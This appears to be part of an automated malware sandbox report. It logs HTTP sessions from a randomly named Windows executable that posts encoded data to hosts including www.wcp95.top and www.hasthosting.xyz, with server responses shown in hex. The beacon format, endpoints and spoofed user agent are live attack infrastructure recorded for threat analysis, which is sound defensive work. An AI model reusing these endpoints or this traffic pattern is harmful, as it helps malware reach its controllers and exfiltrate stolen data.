                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 41 46 4e 72 38 44 59 4d 72 6c 76 6b 4b 32 6d 2f 66 37 5a 49 6f 4a 57 4a 34 58 37 42 35 75 34 68 34 4d 54 67 41 30 43 71 48 55 35 7a 57 59 75 42 6a 41 72 34 33 69 44 6f 78 6f 33 4e 44 63 68 72 42 56 62 71 42 6b 59 49 61 6e 30 48 73 33 66 37 66 44 49 65 51 6a 45 72 62 72 63 36 77 59 77 45 6b 33 4b 69 37 65 5a 4b 32 41 45 33 6d 4c 64 2f 74 79 33 31 67 50 46 42 56 63 61 4d 45 79 4b 49 48 77 35 4e 70 4a 2b 56 37 58 56 5a 56 49 76 79 54 6a 54 2f 61 4d 6d 67 6d 66 33 54 61 45 64 42 72 46 76 31 65 4e 63 7a 57 2f 63 51 35 30 7a 63 6e 62 7a 41 6a 6b 6b 64 78 58 4f 51 78 65 5a 35 7a 61 70 48 35 53 5a 75 58 30 51 4f 65 44 4c 53 34 4f 75 6b 61 4d 4a 6c 2f 72 71 61 70 68 68 55 4c 72 42 43 63 4e 6c 47 33 57 6a 65 4c 73 54 62 75 61 6a 35 70 4f 51 52 38 31 4a 2b 71 4c 77 36 57 4d 66 6d 42 4e 2b 4c 58 66 75 42 53 59 63 37 6f 66 4b 30 72 78 44 4c 44 57 46 64 6b 35 4a 68 53 52 36 64 38 4a 34 71 53 78 35 7a 4f 6a 43 57 35 48 6b 30 57 38 41 75 30 62 47 65 42 37 34 4a 51 72 52 5a 36 42 6c 45 49 67 52 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=AFNr8DYMrlvkK2m/f7ZIoJWJ4X7B5u4h4MTgA0CqHU5zWYuBjAr43iDoxo3NDchrBVbqBkYIan0Hs3f7fDIeQjErbrc6wYwEk3Ki7eZK2AE3mLd/ty31gPFBVcaMEyKIHw5NpJ+V7XVZVIvyTjT/aMmgmf3TaEdBrFv1eNczW/cQ50zcnbzAjkkdxXOQxeZ5zapH5SZuX0QOeDLS4OukaMJl/rqaphhULrBCcNlG3WjeLsTbuaj5pOQR81J+qLw6WMfmBN+LXfuBSYc7ofK0rxDLDWFdk5JhSR6d8J4qSx5zOjCW5Hk0W8Au0bGeB74JQrRZ6BlEIgR1JTOprR16C7meh57OBc4m4J9N1UwX3O/3L3i0emBAtWCFsUsuo1OeXLGfUze9xc24BPaBbEy8M+Yc9T1KoQL32z0F7gODLvsvZ94qkBMejRMFcfNUkb/kFxnweWAZmdN4nxN5AziyGqW1arCV/R62Oy2HEmyq9xhycmyVut7X5k+G6WM9RM/uxioAA7ZPwpzro+LBb+dCxvoYbOz5emRuhc3nkC3znDSN1nVmrcfyvodDTmEJFvaKEplrONwLuATqvFvGYeBWiDlFx0jZV27c7FA7/vYdyUHEQUiVt2ERJVpijnxHlwtomwCBeNMlP+mZielRkYoE5uDGeo+UMEB85SZkY+xMvfQQSQ8f9ImyN1dxKI8LGVekxcEV/y4w+8Ri7HIoL5RSeHufkHyoW2s935k9nVNH31X/ff/i/QWQBCQfUY4nuxulGhf9C4QKi8UhpbEBcuyDvLzbXe2DC6SJa3R3bSZFL+SkyQzv1SrdABR6Vv14xK3q43e6Z+OaeYkxvMbI3ULJ82xPmtWkWrA2h13ms+a8R6245LzortkOaFJcaJiNOnFXv0SyFTL40WMXySFxrQJ9GzWY1vpsrB+E5zSjBWzbkMS0idnO84UtzUKx8dtVrO2r4Fb6jqxdaCqjOLsEJgRUdd6BxsHd2N53ftDT9sO2B8r+b [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:22.208640099 CET270OUTData Raw: 71 63 2f 47 4c 50 37 46 74 49 66 4d 2f 36 4d 31 35 6b 6a 39 49 4b 70 6b 4d 6e 72 78 33 79 56 78 6e 43 33 55 47 55 56 65 71 34 50 2f 50 75 75 6b 6b 37 52 6e 43 48 47 50 2f 78 7a 33 4e 71 4c 52 5a 4f 38 77 74 34 53 36 4d 39 44 43 2f 68 6e 79 6f 31
                                                                                                                            Data Ascii: qc/GLP7FtIfM/6M15kj9IKpkMnrx3yVxnC3UGUVeq4P/Puukk7RnCHGP/xz3NqLRZO8wt4S6M9DC/hnyo1Y0ivmZZP7m3ZeykdTpFUEz2hInQBl5jX0DiKaAZsDSLZ/TdgdKSLaO5pEUTT60LwSL/nYLSSSgd1X4Ac0j7SQAHaq8KNiQsmSvOlFGezBphLSLwIVXrRCMZxswCBzJDnVSgxtCoC/7jl54CC9TRB/fWbU1JGfoYgs
                                                                                                                            Nov 7, 2024 10:53:23.156002045 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:22 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a747c1-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            55192.168.2.2249216154.23.184.9580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:24.744441986 CET781OUTPOST /1bs4/ HTTP/1.1
                                                                                                                            Host: www.wcp95.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wcp95.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.wcp95.top/1bs4/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 41 46 4e 72 38 44 59 4d 72 6c 76 6b 4b 31 4f 2f 66 71 5a 49 6f 70 57 4a 35 58 37 42 75 2b 34 6e 34 4d 66 4f 41 77 36 36 41 6a 6c 7a 50 74 4b 42 69 32 58 34 32 69 44 6e 6c 34 33 4a 64 73 68 2b 42 56 62 32 42 68 59 49 61 6e 67 48 2b 46 6e 37 54 52 77 66 50 6a 45 70 51 4c 63 37 77 59 4e 36 6b 33 32 79 37 64 4a 4b 32 47 6b 33 30 36 78 2f 6d 30 72 31 71 66 45 4b 64 38 61 62 45 79 47 64 48 77 70 46 70 49 79 56 34 6d 4a 5a 53 61 33 79 45 67 72 2f 52 73 6d 62 71 2f 32 50 56 56 39 4d 79 54 6a 50 54 4d 6b 76 64 4c 45 66 79 46 48 6a 6e 71 7a 51 73 52 6b 49 36 6a 72 65 38 39 55 47 73 77 3d 3d
                                                                                                                            Data Ascii: mFptYb=AFNr8DYMrlvkK1O/fqZIopWJ5X7Bu+4n4MfOAw66AjlzPtKBi2X42iDnl43Jdsh+BVb2BhYIangH+Fn7TRwfPjEpQLc7wYN6k32y7dJK2Gk306x/m0r1qfEKd8abEyGdHwpFpIyV4mJZSa3yEgr/Rsmbq/2PVV9MyTjPTMkvdLEfyFHjnqzQsRkI6jre89UGsw==
                                                                                                                            Nov 7, 2024 10:53:25.682163000 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:25 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a747c1-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            56192.168.2.2249217154.23.184.9580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:27.284322023 CET2472OUTPOST /1bs4/ HTTP/1.1
                                                                                                                            Host: www.wcp95.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wcp95.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.wcp95.top/1bs4/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 41 46 4e 72 38 44 59 4d 72 6c 76 6b 49 57 57 2f 5a 4a 42 49 34 35 57 47 67 6e 37 42 35 75 34 6a 34 4d 54 4f 41 30 43 71 48 52 4a 7a 57 65 79 42 69 51 72 34 30 69 44 6e 75 59 33 4e 44 63 68 6f 42 56 66 41 42 6b 63 32 61 6c 4d 48 73 79 6a 37 66 43 49 65 41 7a 45 72 55 4c 63 34 77 59 4d 79 6b 33 6d 32 37 64 4e 6b 32 46 55 33 30 75 52 2f 75 6b 72 32 32 76 45 4b 64 38 61 58 45 79 47 39 48 77 78 64 70 4e 6d 46 37 51 6c 5a 56 34 76 79 66 44 54 38 59 4d 6d 68 69 66 32 51 61 45 51 7a 72 46 76 78 65 4e 34 4a 57 2f 59 51 35 6e 4c 63 6e 63 6e 50 73 55 6b 65 31 58 4f 51 2b 2b 5a 2f 7a 61 6f 44 35 53 5a 75 58 30 73 4f 65 54 4c 53 34 4b 36 37 58 73 4a 6c 38 72 71 44 6e 42 6b 6c 4c 72 39 73 63 4f 38 7a 33 6b 50 65 4b 75 37 62 70 71 6a 35 38 4f 51 62 38 31 49 2b 6a 72 78 52 57 50 76 75 42 4a 62 41 58 66 75 42 53 64 49 37 74 4e 53 30 38 78 44 4c 4c 32 46 65 71 5a 4a 75 53 52 32 7a 38 49 63 71 53 77 68 7a 63 6b 6d 57 2f 42 51 33 63 73 41 76 77 62 47 63 46 37 34 63 51 71 38 38 36 41 64 36 49 68 42 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=AFNr8DYMrlvkIWW/ZJBI45WGgn7B5u4j4MTOA0CqHRJzWeyBiQr40iDnuY3NDchoBVfABkc2alMHsyj7fCIeAzErULc4wYMyk3m27dNk2FU30uR/ukr22vEKd8aXEyG9HwxdpNmF7QlZV4vyfDT8YMmhif2QaEQzrFvxeN4JW/YQ5nLcncnPsUke1XOQ++Z/zaoD5SZuX0sOeTLS4K67XsJl8rqDnBklLr9scO8z3kPeKu7bpqj58OQb81I+jrxRWPvuBJbAXfuBSdI7tNS08xDLL2FeqZJuSR2z8IcqSwhzckmW/BQ3csAvwbGcF74cQq886Ad6IhB1JQmpuw16DLmdsZ7wQM8q4Ipj1U093Iv3LlK0OV5fiGCPn0sSs1OSXNb+Uy+9xvm4CLuBQXK9b+YfsD0SxALj2zgN7lqqL+cvfd4qmlsd+RMAEPNOt7/MFxnjeT8nloh4nxd5Ah6yGqWyM7D/xxnbOyyLEgWE90lyf3iVus7X0k+G02M6bs/3xmIPA6hfw53rrdjBIIhCh/ogIez4QGRZhffnkCSunD6N2F9mtJrykIdPbGEWFvaGEph3ONg9uCHqvEvGec5WsjlG2EjdDG7V7FYR/ulVyW3ER0CVuHERJ1pghnxHzAtwmwa/eMgfP6SZjrBRwIobzODHFo+bIEBu5SJkY+1MvbkQOx8fqP6yBldzFo9KRFiUxd0//wV9+6Bi6VgoM65RCnudx3yiHGsR35kPnRBX3Bb/fLrisjOXeyQSPI48jRuFGhPbC6NHiNYhpfABc8aDu7zbXe2AC6SNa3dZbWVrL+SkzFPv1gDdYRR1Xv1v1K3k43aMZ6qweYIx+JXI3ULKzmxA89WlWrFmh13Ys+G8RIa45YrorIIOK1JcXZiOYXFav0SiFXjo0XMX9BdxsW98EDWZ9Polkhyf5ze7BXXbkfG0jMnOgYUt7UKyoNsNhu704FHUjrgFaxijP68ELj4mbt6MucHf2N9Uftbb9sWMB7P+b [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:27.289467096 CET1734OUTData Raw: 71 38 2f 47 44 39 37 46 42 59 66 4e 76 36 4f 58 68 6b 69 71 63 4b 6c 30 4d 68 72 78 32 63 49 68 36 79 33 55 47 79 56 65 32 34 50 2f 66 75 75 6b 45 37 57 58 43 45 4f 66 2f 4b 73 58 4d 73 43 78 5a 53 38 77 73 66 53 2b 41 58 44 41 7a 68 6d 68 51 31
                                                                                                                            Data Ascii: q8/GD97FBYfNv6OXhkiqcKl0Mhrx2cIh6y3UGyVe24P/fuukE7WXCEOf/KsXMsCxZS8wsfS+AXDAzhmhQ1OxevlpZFhW3Ka1s1TpZYEzGxJVIBkLbXxwaKJwZtJyLI/TBIdJ69aMA8ElPT6ELwWNSVcLSUVgdCX4A00jjOQFOCq+6NiSEmUfPXIme1PJhnSL9SVXidCNpxsy2B1pTnDigxiioL1bjs0YOF9TkplaOAWzpaeJg6r
                                                                                                                            Nov 7, 2024 10:53:28.231308937 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:28 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a747c1-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            57192.168.2.2249218154.23.184.9580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:29.830585003 CET527OUTGET /1bs4/?Vta=nFypuDtholF&mFptYb=NHlL/20Wj3mxTDCCV6AphceXnl/MtZ4Wk+fSFhy0eU4XSufIixCpoBi/gorAC+VzK2LBCRkbZWFQo0n9IQJ7RFp7WJwc0YsNtE+R3Mg/2HoitvY+uCvmluoRVqvz HTTP/1.1
                                                                                                                            Host: www.wcp95.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:53:30.778723001 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:30 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a747c1-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            58192.168.2.2249219185.27.134.14480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:36.033199072 CET2472OUTPOST /04fb/ HTTP/1.1
                                                                                                                            Host: www.hasthosting.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.hasthosting.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.hasthosting.xyz/04fb/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 4a 42 36 4b 36 6f 79 49 64 4c 69 35 2b 49 77 59 42 36 4b 79 77 4d 5a 67 6e 62 75 49 2f 50 72 4c 4f 58 4c 62 30 47 30 72 4b 62 45 58 69 65 58 4f 2b 48 6d 4f 36 79 69 73 36 37 64 42 4b 45 79 4f 4d 63 38 36 41 66 57 6b 74 73 46 31 58 48 2f 46 41 78 32 41 66 75 4d 79 69 67 42 32 74 43 55 53 65 39 31 55 72 67 33 6a 38 75 4d 46 65 77 79 78 72 77 4d 4e 6b 78 41 33 32 70 7a 6b 4c 61 75 57 65 38 38 32 4d 77 63 2b 52 76 76 63 55 31 48 6c 58 54 4c 66 46 64 49 66 6e 2f 6e 31 74 35 5a 7a 6d 78 6d 4d 47 70 30 5a 30 39 78 41 7a 79 69 4f 62 2f 55 72 61 41 42 6e 58 54 4e 5a 49 6c 2b 44 41 33 68 52 4e 4d 59 6d 4c 55 34 31 6d 46 79 32 6c 49 78 34 4f 4b 6c 7a 45 49 32 63 45 32 6b 76 58 36 74 42 73 45 2f 6c 64 39 2b 41 73 65 71 55 4d 54 2f 49 48 5a 5a 37 6a 51 58 46 72 57 48 65 75 59 62 47 73 6d 44 71 31 51 44 4f 55 6e 62 62 6c 4f 79 39 78 76 59 36 64 4b 7a 53 4a 30 6d 49 54 57 75 79 58 43 45 46 4d 46 51 54 73 6c 4a 4e 66 44 7a 4d 61 4e 47 41 4e 72 56 4f 6f 34 63 31 75 2f 35 69 6c 68 4a 46 79 47 4c [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=JB6K6oyIdLi5+IwYB6KywMZgnbuI/PrLOXLb0G0rKbEXieXO+HmO6yis67dBKEyOMc86AfWktsF1XH/FAx2AfuMyigB2tCUSe91Urg3j8uMFewyxrwMNkxA32pzkLauWe882Mwc+RvvcU1HlXTLfFdIfn/n1t5ZzmxmMGp0Z09xAzyiOb/UraABnXTNZIl+DA3hRNMYmLU41mFy2lIx4OKlzEI2cE2kvX6tBsE/ld9+AseqUMT/IHZZ7jQXFrWHeuYbGsmDq1QDOUnbblOy9xvY6dKzSJ0mITWuyXCEFMFQTslJNfDzMaNGANrVOo4c1u/5ilhJFyGLZD6uAjmsYYdju9cHNBQJccVwWCzBaaJ0+2WHET6ZuA8jsttn/lOYZqBwYr0acRFm5sbNbXsgcrL5+MfGAnRh1sRMScz6q0rkbWvin3oNzJmEGZchfBL/WlTJga9BJasgPTfyCj27DqXPGH9lFOKofGO/HElxNuVDQba/Zhr07Nfmpe0pDilFOnYesdMYLHwvZsJ3OqjMRK/eBpljcOdaeruy24mCUfyrxXlMOubN4Xq+HHOmQNmhN3vylp8I/VpruxM6BehhD9ovJZcXzt6DjHa5ZleSj89OgU+XdepVWGknl4ExuM9XXN/Zkv1jyaN5jBg5xyat4XAD+NBzpI/SMfHKfNTFHJobBLP1/RlzJfqVFZ0ssTsZDZQ/IITovMius7Aw7NMp/ffLElvvLZ24lwlFk48fgV1+2WMORx2uy+Ynk88Dz4ixmhDQ8YlkHCTH3L5X0Ry/4pJksj2UTIn8eLLg49TsCWdl8dnqw69eeukYQoA5B6dQp6tao6314LecKmeJ0iUOjRNu0+J8bsyIcNjj9E5QwoZwfsCyj7iHPS3MlwJRVerZfMm04cmFMssncIOydg3pVHKzaOx1Alhcb5JXxdgbsK+nvB03moWMW+2MFtTUFm3AIZuWmVx4du6ENOcvyGYYjxVvJIpEoiIeChblOHTSrX5XiE [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:36.038217068 CET288OUTData Raw: 6c 67 2b 52 4a 4a 66 50 42 64 45 6d 68 33 6c 44 49 2f 46 68 42 43 31 38 30 47 6e 70 68 4a 4a 6a 36 45 32 63 36 53 39 7a 33 76 39 65 67 56 47 6a 4f 6a 6c 76 6b 4e 35 42 62 74 6d 78 49 79 34 4f 36 57 6d 50 7a 76 43 45 59 54 66 74 72 54 55 44 78 4c
                                                                                                                            Data Ascii: lg+RJJfPBdEmh3lDI/FhBC180GnphJJj6E2c6S9z3v9egVGjOjlvkN5BbtmxIy4O6WmPzvCEYTftrTUDxLcdU2GYRsGYmYtWXag79JUwFC9YqBLWKweLrQ5UuJjHDoWOpG8/zQc3WCXjy7+685HoUlbD7AuaHlLlB2RSk2faz1S7m0gxDvpgYbkuQmFjIRZd08qmRqvVaXa4DQB5z9RNPWSFR7FazKiJJ6cSLhPuXfPwXAPWECH
                                                                                                                            Nov 7, 2024 10:53:36.838181019 CET688INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:36 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 31 62 65 0d 0a a1 10 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d0 7c bb f6 a9 b9 75 32 b3 86 a6 dd 03 37 05 8d 30 d1 54 cf fd e0 65 97 2f 06 9c f0 f3 bf cd 6c 60 03 9d cd 35 7b f6 27 48 3d 38 e6 d6 08 b4 4b 02 db 74 7a 68 d4 08 90 27 35 ed 19 66 13 e5 da 78 da 62 d4 0c 92 1b 37 15 9a b9 d4 6e 85 91 db 06 16 e0 8c 83 a7 97 da fa 21 97 04 71 4c 92 11 35 82 55 59 e7 0e 02 96 ac a5 19 27 e4 1f e2 a1 fb 9f 22 75 ed be 02 f2 0b d7 86 85 a7 17 6a 21 03 d8 35 96 d6 8d 83 03 29 1c fd 95 bf a7 7f b1 da 02 9c 6c b7 ea fb 48 47 a8 04 cb d4 01 c6 d4 43 5a fb 81 7d df fe da 87 21 71 21 04 19 6f ec 93 7f 39 c2 29 ae 30 26 e1 c5 c7 04 1a 05 19 5f 76 d5 1b 32 f9 5f ef 40 01 40 ff 81 3d 67 4c 2b 69 53 a9 b2 2c b7 a5 e4 c2 f0 82 f5 a5 d5 4c a6 ba c4 84 6a 9b b7 a5 28 ca d2 e4 ce 39 c1 4d 21 65 29 64 ca 64 ce 04 d3 a5 f4 22 1d 10 03 28 fe 4e 61 8c 96 c2 38 e9 75 aa 15 cf 58 e1 fb 79 56 72 21 dd 48 6a bb 32 db c6 4e 00 73 80 df de 3a d7 76 80 43 a4 61 82 5d 3f b9 78 8c ad 33 db ef 75 17 18 9a 53 45 35 21 21 ae 51 64 7e [TRUNCATED]
                                                                                                                            Data Ascii: 1be +t|u270Te/l`5{'H=8Ktzh'5fxb7n!qL5UY'"uj!5)lHGCZ}!q!o9)0&_v2_@@=gL+iS,Lj(9M!e)dd"(Na8uXyVr!Hj2Ns:vCa]?x3uSE5!!Qd~">1t0QNCk>8zWm7Y$-N&a]<1[F*=*E$f*Zd!1jjv0*F[*3 0
                                                                                                                            Nov 7, 2024 10:53:37.384191990 CET688INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:36 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 31 62 65 0d 0a a1 10 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d0 7c bb f6 a9 b9 75 32 b3 86 a6 dd 03 37 05 8d 30 d1 54 cf fd e0 65 97 2f 06 9c f0 f3 bf cd 6c 60 03 9d cd 35 7b f6 27 48 3d 38 e6 d6 08 b4 4b 02 db 74 7a 68 d4 08 90 27 35 ed 19 66 13 e5 da 78 da 62 d4 0c 92 1b 37 15 9a b9 d4 6e 85 91 db 06 16 e0 8c 83 a7 97 da fa 21 97 04 71 4c 92 11 35 82 55 59 e7 0e 02 96 ac a5 19 27 e4 1f e2 a1 fb 9f 22 75 ed be 02 f2 0b d7 86 85 a7 17 6a 21 03 d8 35 96 d6 8d 83 03 29 1c fd 95 bf a7 7f b1 da 02 9c 6c b7 ea fb 48 47 a8 04 cb d4 01 c6 d4 43 5a fb 81 7d df fe da 87 21 71 21 04 19 6f ec 93 7f 39 c2 29 ae 30 26 e1 c5 c7 04 1a 05 19 5f 76 d5 1b 32 f9 5f ef 40 01 40 ff 81 3d 67 4c 2b 69 53 a9 b2 2c b7 a5 e4 c2 f0 82 f5 a5 d5 4c a6 ba c4 84 6a 9b b7 a5 28 ca d2 e4 ce 39 c1 4d 21 65 29 64 ca 64 ce 04 d3 a5 f4 22 1d 10 03 28 fe 4e 61 8c 96 c2 38 e9 75 aa 15 cf 58 e1 fb 79 56 72 21 dd 48 6a bb 32 db c6 4e 00 73 80 df de 3a d7 76 80 43 a4 61 82 5d 3f b9 78 8c ad 33 db ef 75 17 18 9a 53 45 35 21 21 ae 51 64 7e [TRUNCATED]
                                                                                                                            Data Ascii: 1be +t|u270Te/l`5{'H=8Ktzh'5fxb7n!qL5UY'"uj!5)lHGCZ}!q!o9)0&_v2_@@=gL+iS,Lj(9M!e)dd"(Na8uXyVr!Hj2Ns:vCa]?x3uSE5!!Qd~">1t0QNCk>8zWm7Y$-N&a]<1[F*=*E$f*Zd!1jjv0*F[*3 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
